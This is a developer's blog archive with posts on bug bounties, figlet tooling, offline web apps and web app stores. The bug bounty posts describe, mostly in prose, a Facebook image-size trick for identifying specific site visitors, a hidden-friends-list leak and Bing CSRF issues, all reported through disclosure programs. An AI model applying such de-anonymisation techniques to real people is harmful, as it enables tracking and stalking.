Category Archives: Development Thoughts

Bug Bounty Redux

A couple of weeks ago I was having one of those Fridays where I was just kind of dragging. Right before I was about to clock out and go pick up my son, a message from “Facebook Security” popped into my inbox. Since I hadn’t submitted any reports since last year, I was confused. Was this because I had done something wrong? Was my account hacked?

I opened the message and read the following:

Remember this report? 🙂 Definitely an unusual timeline and one that should have been much, much shorter. We do have a fix for this that we’re finally working to deploy. We hadn’t forgotten about your report, though, and we still want to send a bounty of $1500 in appreciation. Again, it should have been sent way sooner, but we appreciate your patience with us and I assure you this timeframe is not the norm.

Whoa, what a way the end a week! I had to reread the submitted report twice to remember what it was about.

Last year I briefly got into bug hunting and had ended up submitting a few vunerability reports. This particular report was put in late last Fall. It was kind of a complicated exploit, and for it to work, you either had to lock down your own friends list and target one or more of your friends, or target someone who had their own friends list locked down. Once that step was out of the way, you could setup your webpage to detect when these particular people visited your site. I thought it was too minor, but ended up submitting it after my office mate told me to go for it.

Originally I had heard back from Facebook’s security team that they were looking into it, but shortly after that correspondence I submitted two other reports and subsequently forgot about this one. Even though it’s been a while, it’s pretty cool they didn’t forget about it. Due to it being pretty obscure / minor, I wouldn’t have batted an eye if they had ignored the report.

Bing Bugs

I had a similar experience with Microsoft’s Security Center last year, though the outcome was more of a buzz kill. I had decided to take a look into their bounty program, and after poking around a bit, I found some CSRF bugs in Bing Rewards. The bugs allowed any third party web site the ability to check and see if a visitor was a member of Bing Rewards, to get their point count, and to change some of their settings (like what their reward goal was). Even though none of this was a big deal, I thought it was enough to at least get listed on their acknowledgments page.

Sadly I was mistaken. After I filed the report they generated an internal ticket and the bug was passed around. Then it was radio silence. 4 months later I got an email with this message:

We investigated the reported issue and the behavior is by design to ensure Rewards user can earn credits. We will be closing this MSRC case, please let me know if you have any questions.

None of that made any sense. My impression was they didn’t care and just wanted to close out one of their old tickets. It made me a little sad, but thankfully I didn’t spend too much time investigating their services. If I ever get back into bug hunting, I now at least know to avoid their program.

patorjk.com Scrolling Text Time Waster Bug

A couple weeks ago a friendly visitor named Cayd reported a Path Disclosure bug in my Scrolling Text Time Waster. There’s no bounty program for this site, but it was definitely cool that he shot me an email letting me know about it. Since I’m now writing an article on bug hunting, I figured I’d give him a shout out.

figlet and grunt-figlet npm packages

Last month I discovered Grunt, which is described as a “JavaScript task runner” by its creators. What’s that mean? Well, it allows you to automate mundane tasks like JS-linting, JavaScript/CSS minifying, compiling LESS into CSS, watching files for updates, and other development tasks. I had personally been using makefiles for these types of tasks, but after coming across a Grunt plugin for inlining AngularJS templates, I ended up going down the Grunt rabbit hole and converting over my makefiles to gruntfiles.

Once I had everything working with Grunt, I thought it might be fun to try and write my own plugin. Since Grunt is node.js based, I decided it might be neat to use the figlet.js library I wrote a while back to auto-generate ASCII banners for source code files. figlet.js was originally written to be browser-side only, so I had to do a little reworking to get it to work with node. However, after I had created an npm package for it, I wrote a simple grunt plugin around it called grunt-figlet. You can the result of a test run of the plugin below.

/**
 * _________            .___      
 * \_   ___ \  ____   __| _/____  
 * /    \  \/ /  _ \ / __ |/ __ \ 
 * \     \___(  <_> ) /_/ \  ___/ 
 *  \______  /\____/\____ |\___  >
 *         \/            \/    \/ 
 * This is a message for the comment body.
 * More random text...
 */
function abc(a,b,c){console.log(a+b+c);}var a=1,b=2,c=3;abc(a,b,c);

My office mate pointed out that it sort of defeats the purpose of minifying, but I still think its cool. The Text to ASCII Art Geneartor has a similar code comment feature, though it supports more languages. I’ll probably add support for other commenting styles into the grunt plugin later on, though right now I’m not sure if Grunt is used for any non-web development type projects.

After posting the project up someone submitted a change to allow the figlet library to work at the command line. However, I decided to break it out into its own package, so someone could use the library without it interfering with an existing installation of figlet. Ultimately I think it would be cool if this command line app mirrored the behavior of the c-based app. I mentioned the idea on the figlet mailing list, and Ian (the I in FIGlet) seemed to like idea. However, unless there’s suddenly a bunch of interest, right now that’s low on my list of things to do (though if you’re up for the task, feel free to submit changes to it).

Random updates for June

I feel like I work on this site a lot, but hardly ever post anything. Some of that may be due to me starting projects and then never finishing them though :P. Below is a collection of random thoughts and updates related to the site.

Gradient Image Generator

I’ve updated the Gradient Image Generator app and added support for CSS3. This update is in the style of what I was doing in my last post. I was going to do a “part 2” post, but I changed how I was updating apps when I got to the Keyboard Layout Analyzer.

Keyboard Layout Analyzer Overhaul

I’m currently overhauling the Keyboard Layout Analyzer. This was long overdue since the chart library it uses, Plotkit, is long dead (in terms of active development), as is Mochikit, the JS library Plotkit uses. The new front-end will be powered by AngularJS and use jqPlot for its charts. I tried to find a place for xkcd charts, but couldn’t come up with anything that didn’t seem totally out of place. I’ll go into more detail on the new front-end when its finally up, and I’m open to feature suggestions if anyone has any.

TAAG

I added support for MySQL comments in TAAG. I also removed its offline web app capability. Offline web apps seem to confuse users, and I’ve noticed downloading errors in Chrome while using it on my iMac. This seems to happen randomly and because there are lots of files that need to be cached, and it doesn’t seem to be repeatable. With the appcache API being in disarray, and after running into bugs in Chrome and FireFox, I’ve lost my enthusiasm for this particular web browser feature.

iMac

I’ve forsaken my Microsoft roots and purchased a souped-up, 27 inch iMac. I wasn’t a fan of Windows 8, the wires from my PC were making me nuts, and I thought it might be interesting to switch things up. I’ve only had the computer for a few months, but so far I’m pretty impressed. The big screen is amazing, I love being able to use terminals, updating software with brew is nice, and I’m a big fan of the magic mouse. The only downside so far has been that I can’t run Internet Explorer. I’m not sure how Mac users did web development 5 years ago…

Google Authorship

I feel like I’m the last person to know about this, but figured I’d mention it here anyway. Have you noticed people’s faces showing up next to certain search results? Apparently it’s called Google Authorship, and it’ll let you stick your picture next to webpages that you author. It only seems useful for blogs and news articles, but it’s kind of neat.

Spam Comments

When I get a blog comment that I think is spam, I google it to see if its been posted elsewhere. Usually my gut is right, and I see the comment posted on a dozen or so other blogs. Recently though, I came across a spam bot that had messed up and posted this:

{
{I have|I've} been {surfing|browsing} online more than {three|3|2|4} hours today, yet I never found any interesting article like yours. {It's|It is} pretty worth enough for
me. {In my opinion|Personally|In my view}, if
all {webmasters|site owners|website owners|web owners} and bloggers made good content
as you did, the {internet|net|web} will be {much more|a lot more} useful than ever before.
|
I {couldn't|could not} {resist|refrain from} commenting. {Very well|Perfectly|Well|Exceptionally well} written!|
{I will|I'll} {right away|immediately} {take hold of|grab|clutch|grasp|seize|snatch}
your {rss|rss feed} as I {can not|can't} {in finding|find|to find} your {email|e-mail} subscription {link|hyperlink} or {newsletter|e-newsletter} service. Do {you have|you've} any?
{Please|Kindly} {allow|permit|let} me {realize|recognize|understand|recognise|know} {so that|in order that} I {may just|may|could} subscribe.
...
}

As you can see from its setup, it appears to randomly choose synonyms for many of the words. It also has around 2 dozen comment templates (for the sake of brevity, I’ve only included the first two). I was actually kind of impressed, that’s pretty clever! They knew how people were checking for spam, and adapted to try and get around it. Pretty soon spammers will be using AI to analyze a blog’s content, and then use that information to post a relevant comment or follow-up comment, and bloggers will have no idea that they’re conversing with spambots.

Design Overhaul (part 1)

Like a book being judged by its cover, people tend to judge an app by its UI. Since jumping into a web development job 3 years ago, I’ve done a fair amount of client side work. I’ve helped redesign legacy applications with cool new UIs to lots of praise, even though the new apps had less features. And I’ve seen customers balk at feature-rich products that had so-so interfaces. And it makes sense, people like to use stuff that looks good, and if you can’t be bothered to put work into the design, what does that mean for the rest of the app?

I’m not a designer, and most of the stuff on this site was created before I really knew much about design. So as a result, a lot of what’s here looks pretty meh. After writing my last post, I took a look at the text fader that’s on this site and was kind of embarrised. I decided something needed to be done, so I started going through the various sections of this site and giving the layouts a much needed fresh coat of paint.

Mobile Version

The new designs aren’t amazing by any means, but I think they’re a step up, and hopefully they’ll provide a better user experience. I decided to use Twitter Bootstrap for a lot of the basic look and feel, since it looks great and plays well with jQuery. I’ve also been trying to make the new layouts responsive, so that they also look good on mobile devices.

I’m not allowed to bring a cell phone into work, so until last year, I avoided getting a smart phone. However, now that I have an Android, I use it all the time outside of work, and I’ve realized that I’ve made a big mistake by avoiding mobile development.

So now that the background is out of the way, what has actually been updated so far?

There are several more sections of this site I’m going to overhaul, but figured I’d do a write-up of what’s been done so far. I’ll also probably go back an revisit some of the sections I’ve already done if I get some better ideas. If you have any suggestions for anything just let me know.

Was Mark Zuckerberg an AOL add-on developer?

mark_adjusted_350

Facebook founder Mark Zuckerberg’s first website was recently found to still be online at Angelfire, an early free web hosting site. The Internet Archive confirms the site existed in its current form back in 1999, and the page’s source code is noted to be authored by “Mark Zuckerberg”. In addition, the author states they’re 15 (the age Mark was in 1999), and that they live outside of New York City (where Mark lived when he was 15). Motherboard provides further evidence, showing that the primary AOL account for the email listed on the site is a name commonly used by Mark Zuckerberg’s father.

The site screams 1999 web design, and is a very cool piece of internet archaeology. It should also be noted that it’s actually a pretty decent effort for the time for a 15 year old (you only have to see the About section of this blog to see my effort at 16). However, the most interesting aspect of the site is “The Vader Fader”, an AOL add-on application that Zuck was heavily promoting on the site. Did this mean he was apart of the AOL add-on community? Did he use AOL progs? Did he develop in Visual Basic?

vader

I downloaded The Vader Fader, and it is for AOL, and it was indeed written in Visual Basic. I tried firing it up, but got a message box saying I needed to be “online” and then the window on the left popped up. Ugh, I just want to see what this app looks like, I have to have AOL open? So I hunted down a version of AOL 4.0, installed it, and then tried running the app again. This time I got a runtime 6 error – this was most likely caused by Zuck using Integers to store window handles instead of Longs. After Windows 98, window handles started being Longs instead of Integers.

Being persistent, I decided to download Windows Virtual PC and load up Windows 98. After burning AOL 4.0, The Vader Fader, my API Spy, and a hand full of VB dependences to CDs and then loading them up on the OS, I fired up The Vader Fader. This time it didn’t crash, but it still told me I needed to be online. Crap… how was I supposed to do that? I tried signing on, to see if by some fluke AOL was still active and letting random people sign in, but it didn’t work. It then occurred to me – how did progs back in the day determine if someone was signed on? I couldn’t believe I remembered this, but the way it worked was the app would find the main AOL window, and then look for a child window that had a caption that started with “Welcome, “.

I used my API Spy to change the caption of the existing AOL sub-windows to “Welcome, PAT or JK”, and then tried launching The Vader Fader again. This time it worked! Well, sort of. Instead of a message popping up, the caption of the main AOL window changed to “The Vader Fader”, and then nothing happened. I poked around, and the app was running in the background, but there was no main window and it didn’t appear to have done anything else. My best guess is the app worked by augmenting AOL chat rooms and IMs with fading options (why else would it change the main AOL window’s caption?). If that’s the case, there really wouldn’t be much to see, or really any way to see it – given that AOL 4.0 chatrooms and IMs are long defunct.

I was a little sad, but glad I’d at least gotten the app up and running. I also ended up digging through the app’s machine code a little for any other clues on how it was created, but didn’t really find anything interesting (other than the 10 color choices). Since the app used the same online detection mechanism as most other apps at the time, I wonder if Zuck used a common bas file like dos32.bas or genocide.bas – that’d be pretty cool if he did. It’s also kind of neat that the main app he was pushing was a fader, since that was the first app I released on this site. Anyway, I’ve spent way too much time on this. The site is a cool piece of internet archaeology and definitely worth poking around a bit if you have a few extra moments.

Facebook User Identification Bug

Time for Round 2

I decided to take another shot at Facebook’s Security Bug Bounty program. This time I ended up finding a bug that allowed a website to use Facebook to detect if a visitor was a particular person. After doing a write-up and submitting it to Facebook’s security team, I was awarded a $1,000 bounty. Below I’ll go into how I came across the issue and how the technique worked. Also, I don’t see myself going full-on bug hunter after this or anything like that, this has mostly just been a random side-adventure that came from me being inspired by some random blogs I read on bug hunting and application security.

How it worked

I noticed that the preview-image for a Facebook Badge was dynamically generated based on a user’s Facebook ID. There were some other configuration parameters, but for simplification, you can imagine the HTML looking something like this:

<img src=”https://facebook.com/badge_edit.php?id=12345″ />

When rendered, the image would look something like Figure 1. Since it could contain a user’s email address, my first instinct was to see if I could load other users’ badge previews and get their email addresses. However, when I tried this, a Facebook logo image loaded instead of the profile image (Figure 2).

Figure 1

Figure 2

This meant that only the user themselves could view their profile badge preview. However, even though the logo was put in place to block information from being leaked, I realized that it still leaked information. An external website could use JavaScript to silently load tons of profile badge previews with different user IDs, and then check their height and width. If one of these images loaded and it wasn’t the height and width of the Facebook logo, the website would know that that particular user was viewing their page.

This had a lot of interesting use cases. Someone could:

  • See if a particular acquaintance (boss, ex-girl friend, frenemy) was stalking their Facebook feed or reading their blog.
  • See if someone famous was visiting their site.
  • Track the actions of certain people.
  • Show different content depending on who was visiting.

The one limitation was that someone could only check against a list of certain people, but there are only so many people someone can know, and targeted attacks are for particular people anyway.

Submitting the Bug

It was 1am Monday morning when I found this bug. When I realized what I could do with it, I had a rush of adrenaline and stayed up another 3 hours coding up a proof of concept and submitting a bug report. I really should have just gone to bed and wrote the report the following day (I’m supposed to be in at work by 9am), but it felt sort of like when you’re on the last level of a video game and your mind is buzzing with “holy crap, I’m going to beat the game!”

Similar to my last report, it took around two weeks for a security analyst to get back to me, and similar to last time, I was told it was interesting but that they needed to check with their engineering team. I was a little worried at this response – however, I felt that this time I’d found something that was really cool. Hell, it’s something that I would be tempted to use.

About a week later I noticed the bug was fixed and I received an email asking me to verify the fix. I did a few tests and then let them know that everything checked out. Shortly after this I got an email from the security team letting me know I was eligible for a $1,000 payout and that I needed to fill out a W-9.

Final Thoughts

In addition to Facebook, I also tried the white hat programs of a few other sites, and even ended up making Google’s honorable mention list and earning Reddit’s white hat profile badge. It’s kind of cool to get little bit of recognition and pocket change for finding security holes, though part of me is unsure if it’s actually worth it, since it is a decent amount of work for no guaranteed return. However, overall I am glad I did it since I learned a little more about security and it felt great to score a few finds.

The Chrome Web Store Effect

It’s been about 5 months since I tried out Chrome’s Web Store for my Snake and Text to ASCII Art apps, and I figured I’d give an update on how putting them in Chrome’s Web Store has effected their usage.

My Snake game has sat around for about 4 years on this site, consistently getting an average of around 30-50 users a day. I originally wrote the game as a nostalgic tribute to my high school days, and it’s only undergone a hand full of updates since its initial inception. Since this site was getting around 6.5k visits a day, 50 visitors means the app was accounting for around 0.077% of the site’s total traffic. After placing the app in Chrome’s Web Store, the daily usage began to steady rise, and the app has recently been getting between 900-1,000 visitors a day on the weekdays:

Snake Stats

Holy crap, the Chrome Web Store is awesome! Even with the bagillion other Snake games listed in the store, traffic has gone through the roof, with daily usage up 2,000%! But what about the TAAG app, has it also seen such a meteoric rise in traffic? Interestingly, even though both the Snake app and TAAG app have a similar number of installs, TAAG hasn’t seen a noticeable rise in traffic:

TAAG Stats

Hrm, this is kind of interesting. My guess is that this discrepancy is caused by the following factors:

  • TAAG is a utility app and isn’t really something that’s used often.
  • There is a high volume of people trying out games in the Web Store (installing them, and then uninstalling them if they don’t like it).

It’s hard to be certain of what’s actually going on, but I found these results to be pretty interesting, so I figured I’d share. I had wondered if the Chrome Web Store would be a positive for web app developers, and so far, from my limited experience, it seems like could potentially be a big plus for web app developers, especially game developers.

Facebook Bug Hunting

Image By laikolosse

Facebook has a neat security bug bounty program where developers, hackers, security researchers, and random Joe’s can submit security flaws to Facebook in exchange for a monetary reward and a place on their White Hat thank you list. Their minimum payout for finding a bug is $500, and that number increases based on the severity of the issue you report. Recently I’d read about amounts as high as $3,000 and $3,500 being paid out, and while this isn’t a ton, it’s definitely a nice amount of pocket change.

Since I was on break with my newborn last month, I decided to take a stab at uncovering an issue myself. Finding bugs is more about being clever than it is about being smart, and I figured the surface area for security issues on Facebook had to be pretty big.

I started out my journey by setting up a couple of test accounts in the Facebook sandbox. At first I tried a number of broad attacks – generic CSRF attacks, generic XSS attacks, faking email headers when sending email to an @facebook.com address, and lots of other really obvious things. Nothing seemed to work, and Facebook seemed to be a more hardened application than I had originally thought.

Original Image By javier.reyesgomez

At this point most people would get bored and move on, but I’m a little more stubborn than most people. I regrouped and realized my current path was fruitless. What I really needed was focus. I needed to look at one feature and see if I could find a hole in it. After surveying the different privacy settings, I decided to see if I could get around the setting that allowed someone to hide their friends list from their friends.

I poked and prodded and looked at everything related to the listing of a user’s friends. Finally I noticed something odd about Facebook’s one of the ajax calls that was being made under the covers. I was able to get it to return an error if a certain user parameter wasn’t a friend or a friend of a friend. Hrm, this was interesting. This meant I could do a check to see if a user was my friend or a friend of one of my friends. I wondered if this check factored in friends that were hidden from me. I rearranged the friend relationships in my test accounts and tried it out. Sure enough, the check didn’t respect hidden friends. This meant I could check if certain people were on the friends list of friends who were hiding their friends from me. If I only had one friend hiding their friends list from me, I could definitively check if certain people were on their friends list.

I ran some more tests, and with the consent of my friend Joel, confirmed the issue on the production version of Facebook. I then wrote up a test case (an attacker friends a victim, the victim accepts the friendship but hides everything from them) and submitted the how-to steps to Facebook’s Security Team.

And then I waited. Two and a half weeks came and went. I began to think my submission had been ignored when a message popped into my inbox from Facebook’s Security Team. They apologized for the delay, were very polite, and told me they thought the trick was pretty interesting. However, they wanted to double check with their Privacy Team to confirm how certain behavior was supposed to work and then they’d get back to me. They also mentioned they were going through a large backlog of issues. This made me curious as to how many submissions they get a day. Interestingly, around the time of this email I saw another individual go public with a bug they’d found due to not hearing back about a report quickly enough.

I was hopeful after the first email. The trick allowed someone to obtain information about their friends that was supposed to be hidden. It wasn’t the greatest find, but it was a neat little trick. However, the following week they emailed me saying that while they thought it was a cool trick, they felt it was an acceptable risk and that planned updates they were rolling out would eliminate it anyway.

The wind came out of my sails, and I felt like the achievement had slipped through my fingers. I still applaud them for setting up such a system, and being able to work in a sandboxed version of Facebook to try out different techniques is really cool. However, I’m left with mix feelings. Though then again, if you’re bored and just want to try and hack Facebook, it’s a fun way to spend a few hours.

Update 2013/27/02: I got confirmation a few days ago of a 1k reward on another bug I submitted. I may do another post on it, or may just make a short update here.

Trying out Chrome’s App Store for the Web after falling down the W3C Widget Rabbit Hole

In my last post I discussed offline storage for web apps, and that I wasn’t sure how users were supposed to know that certain apps worked offline. Google Chrome has come up with a neat solution for this that allows users to “install” web apps via their Chrome Web Store. I’d played around with its previous incarnation, when it was the Chrome Extension Gallery, but I hadn’t really been back since it opened up to web apps and changed its name.

Installed App

The Chrome Web Store is interesting because you can submit both packaged apps and hosted apps. A hosted apps is simply a zip file of a metadata file and some icons. The metadata file explains general information like the URL for the app and if it works online or not.

Installing a hosted app is sort of a fancy way of bookmarking it, but the fact Chrome tells you whether it works offline or not is a big plus. This solves the issue of letting users know that an app’s URL will work even when they don’t have an internet connection.

This is exactly the kind of thing I was looking for! To try it out, I decided to create hosted apps of my Text to ASCII Art Generator and JavaScript Snake Game:

Both work offline, and I plan to create hosted apps of some of my other programs too, but for now I’m just testing the waters. FireFox will also soon launch a web app store called The Mozilla Marketplace. It’s setup will be similar to chrome’s, though it’ll be slightly more feature rich, allowing you to run web apps like Desktop programs. This feature is similar to the idea behind W3C Widgets, though W3C Widgets seem to have fallen out of favor.

As an aside, before I ended up at Chrome’s Web Store, I took a detour through the world of W3C Widgets. I hadn’t heard of them before, and unless the tides change, I may not hear much about them again. However, I figured I’d write up what I learned, since they seem to be one of the least popular pieces in the HTML5 puzzle.

W3C Widgets?

While researching offline web storage, I was bothered by the fact that normal users would have no idea that certain URLs still worked when they were offline. With this concern, I ended up emailing the W3C’s fixing-appcache mailing list because I could only find a small bit of discussion on the topic, and that discussion didn’t come to a consensus about what to do. The response I got was pretty interesting, and made me realize there were areas to the HTML5 world that I hadn’t seen:

This is essentially what the Widgets spec is supposed to achieve.  See
here for an example of a widget configuration:

http://www.w3.org/TR/widgets/#example-configuration-document

It makes sense to split packaging a website from providing offline
storage/caching technologies, since the two are different solutions to
different problems.  It's true that there is some crossover,
especially if a widget includes content in its package.  But the
widgets spec has its own problems, not least of which is a terrible
name.

Letting users know that your site will work when offline doesn't seem
like a terribly difficult problem to solve at the application level,
to be honest. I think as a developer I'd rather browser vendors spend
their time on other stuff :-).  But it's certainly a fair point, and
does need to be considered as part of the UX of your app.

After thinking about it, he was right about separating out the packaging of an app from its offline storage capability. However, what was this widgets spec he mentioned? I’d never heard of W3C Widgets, so I decided to some research.

W3C Widgets are essentially packaged web apps. In fact, at one point, ppk proposed that they be put under the buzz word “HTML5 apps”. The W3C Widget spec discusses a format similar to Chrome extensions. You have a zip file of a directory structure containing HTML, CSS and JavaScirpt files, with a config.xml file that explains the basic metadata of the widget. Widgets can be embedded within a webpage or run from a user’s desktop. Not exactly what I was looking for, but it sounds kind of neat. Why had I never heard of this before? I did some more googling and the vast majority of the blogs and news regarding W3C Widgets seemed to be from 2009 or 2010. I could find nothing on Chrome, FireFox or IE implementing the spec – even though as of September 27, 2011, it became an official W3C recommendation.

I did, however, find a hand full of projects that used the spec. While there wasn’t a lot of buzz around W3C Widgets, there appeared to be enough going on with them that they weren’t in danger of falling into the abyss, at least not yet. Below is a list of the projects I found with some notes I made on them.

  • Opera’s Web Browser – Opera appears to have fully embraced W3C Widgets and is using the spec for Opera extensions. They’ve also set the browser up so that it will run widgets that you launch from your desktop. So its basically allowing you to create native-ish HTML5 apps. I find it peculiar that no other vendor has embraced W3C Widgets like Opera has.
  • Apache Wookie – This appears to be a widget environment and it reminds me of the OZone Widget Framework. Though Apache Wookie runs W3C widgets while OZone runs OZone widgets.
  • Phonegap – This framework allows developers to create HTML5 apps that can be distributed in mobile phone app stores. Its app configuration is based on the W3C Widget spec.
  • Wholesale Applications Community (WAC) – “An allegiance of telecommunications firms and others working together to create a common mobile platform” [ref]. W3C Widgets are apart of what they’re doing. However, according to this article, they ended up failing.

So each of these projects is kind of cool, but none of them addressed the original problem I had – how the hell are users supposed to know they have web apps installed on their computers that will work when they’re offline? And if W3C Widgets are the answer, why aren’t the major vendors adopting them? Eventually I had some nice people direct me towards the Chrome Web Store, and it was also nice to find out that FireFox will soon have its own web store too. Hopefully IE10 will do something similar when it comes out.

Even though I didn’t find them useful, it was interesting to learn about the existence of W3C Widgets. I’m not sure why they seem to have failed, as they’re essentially a way of packaging HTML5 apps. Though then again, I do think Chrome’s manifest is a lot nicer than the config.xml that the W3C Widget spec detailed.

Notes on Offline Web Storage for TAAG

After you’ve visited it at least once, the Text to ASCII Art Generator (TAAG) will now work even when you don’t have an internet connection. I had a user request this, so I figured I’d add it in for them and anyone else out there who may want to use the app offline.

Offline web applications are one of the new capabilities being introduced with HTML5. An offline web application has its files downloaded and permanently installed in a web browser’s application cache. This allows users to go to an app’s URL and have it work even when they aren’t online. It’s a smart idea, but it has some interesting pros and cons. In this entry I’ll detail what I did to set TAAG up to work offline, detail some issues I ran into, and provide some notes for anyone looking create an offline app.

The first step in creating an offline web application is to create a manifest file which tells the browser which files it should store in its application cache, which files should try getting from the network, and if offline, which files it should use in place of certain standard files. Any HTML files that reference this manifest will be implicitly added to the CACHE section of the manifest and after a user’s first visit, all cached data will come from the application cache, even if a user F5’s the page. The application cache is only ever updated when the manifest file is updated, and even then, it will take 2 visits for a user to see any updates. This is because when a user visits the app’s URL, the application will be read from the cache, it will then see the manifest has been updated, and it will then update the application cache for the user’s next visit. These idiosyncrasies are a bit to take in, but once you know what’s going on its not that bad. Here’s what a sample manifest file would look like:

CACHE MANIFEST
# This is a comment.
# The cache is only ever refreshed when changed.
# Last updated: 2012.08.18

# The CACHE section indicates what we want cached.
# The HTML file linking to this manifest to auto-added to this list.
CACHE:
one.jpg
two.jpg
jquery.js?12345

# The NETWORK section indicates which non-cached files should be 
# obtained from the network. This will almost always be "*".
NETWORK:
*

# The fallback section allows us to setup "fallback" pages to use 
# when offline.
FALLBACK:
page2.htm page2-is-offline.htm

An HTML file linking to this manifest might look like this:

<html manifest="my.appcache">
<head><title>Test</title><meta charset="utf-8"></head>
<body>
<div>Some text</div>
<img src="one.jpg"/>
<img src="two.jpg"/>
<script src="jquery.js?12345"></script>
</body>
</html>

And one last gotcha – to keep the manifest file from being cached by the browser, and to ensure the manifest is served with the correct mime type (an incorrect mime type will keep the manifest from being recognized), we need to update the web server’s configuration. For Apache, we’d add the following rules to our .htaccess file:

AddType text/cache-manifest .appcache

<Files *.appcache>
    ExpiresActive On
    ExpiresDefault "access"
</Files>

That should do it! With this technique your users will now be able to use your apps even when they don’t have an internet connection. I find this cool because it makes web apps more useful and puts them a step closer to supplanting Desktop apps. However, there are unfortunately a number of issues that have held offline web apps back, and they’re worth mentioning.

Issues with application caching

A lot of people aren’t happy with how application caching currently works. The W3C has set up a working group that’s discussing possible improvements, though hopefully the main components of the current spec will continue to work. However, I also feel like they need to make some changes too. Below I’ll list my biggest concerns.

  • How would users know that certain URLs still work when they’re offline?

    I don’t understand how this isn’t the most important issue for offline applications. Without someone manually telling you that you can use a particular application while offline, I don’t see how someone would think they could browse to example.com/webapp and expect it to work when they didn’t have an internet connection. In their current form, I only see offline applications as useful to techies or people in the know.

    It’d be nice if offline applications could provide an icon, name, and description, and then browsers could show users which offline applications they had installed. It could be argued that this is a browser feature, but bookmarks are a browser feature too, and all browsers allow webpages to provide a favicon for bookmarking purposes. Whatever the case, there should be a way to let users know certain web pages/apps work offline.

    I’ve only seen this discussed once, and the people involved didn’t come to any conclusions, so I’m not too hopeful on this one. However, I think it’s probably the most important point, since no users = no usage.

    2012.09.01 Edit: Someone alerted me that there is a Widgets spec that’s currently in the works that supposed to solve this issue. I haven’t taken a good look through it yet, but it’s good to know there are attempts to solve this problem currently in the works.

  • Fresh updates aren’t served immediately / F5 doesn’t break the cache / the page that links to the manifest has to be cached.

    This seems to be the most popular feature request, though after reading spec author Hixie’s take on the issue, I sort of agree that many of the use-cases for using the application cache in this way are very similar to straight up HTTP caching. Though it would be nice if an app used the HTTP cache while online and this cache synced with the application cache, which would then be used when a user was offline.

    Around two months ago, a new feature was added to spec in an attempt to address this. It takes the form of a new setting that gets added to the manifest:

    SETTINGS:
    prefer-online
    

    It’s explained here, though there’s some debate on if its the right solution, and I was unable to get it to work in Chrome or the nightly FireFox build, so I’m not sure how it works or if it actually solves the problem.

Other Notes

  • Chrome was easier to work with than FireFox

    Chrome will print to the console as its loading the application into the cache, so you know instantly if there’s a problem or not. FireFox didn’t do this and that made it a bit more annoying to work with.

  • Listing installed applications

    • For Chrome, browse to the URL “chrome://appcache-internals/”
    • For FireFox, in the menu, go to: “Tools>Options>Advanced>Network” and see the section on “Offline Web Content and User Data”.

  • In the manifest, URLs need to be URL encoded and query strings needed to be included

    Kind of obvious, but worth mentioning.

  • The popular iframe trick doesn’t work in FireFox

    There is a popular trick that aims to allow an HTML page to use the application cache while not being cached itself. It attempts this by having the page include an iframe with an HTML tag that links to the manifest. From my own tests, this trick works in Chrome but not in FireFox.

    2012.09.10 Update: After updating to FireFox 15, it seems to work now.

  • JavaScript API

    I didn’t go into it here, but there’s also a JavaScript API for the application cache. See the “Additional Resources” section below for more information.

  • What would happen if every website wanted to work offline?

    The space on a user’s computer is finite. I’m not sure how offline storage will work if offline apps end up becoming very popular in the future. Maybe the solution is to focus on installable apps which have the option of working offline – and users can pick and choose what they want installed?

Additional Resources